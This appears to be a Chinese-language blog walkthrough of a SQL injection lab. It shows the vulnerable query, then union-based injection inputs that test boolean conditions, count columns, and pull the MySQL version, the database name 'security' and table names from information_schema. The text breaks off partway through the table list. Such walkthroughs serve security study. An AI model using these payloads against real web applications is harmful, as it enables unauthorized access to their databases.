后台代码:
select username from users where username = '$uname' limit 0,1;
uname输入:aaa' and 1=1%23 猜测是否是基于联合注入;
select username from users where username = 'aaa' and 1=1%23' limit 0,1; 猜测正确;
uname输入:aaa' and 1=2%23 错误,所以是基
select username from users where username = 'aaa' and 1=2%23' limit 0,1; 于联合注入
uname输入:aaa' order by 3%23 求出列数(有3列);
uname输入:aaa' and 1=2 union select 1,2,3%23 求出显示位;
uname输入:aaa' and 1=2 union select 1,version(),3%23 求出版本(5.5.47);
uname输入:aaa' and 1=2 union select 1,database(),3%23 求出数据库名(security);
uname输入:aaa' and 1=2 union select 1,group_concat(table_name),3 from information_schema.tables where table_schema='security'%23 求表名 (emails,refe
使用Burp:暴力破解+渗透管理员系统
最新推荐文章于 2024-06-16 12:57:56 发布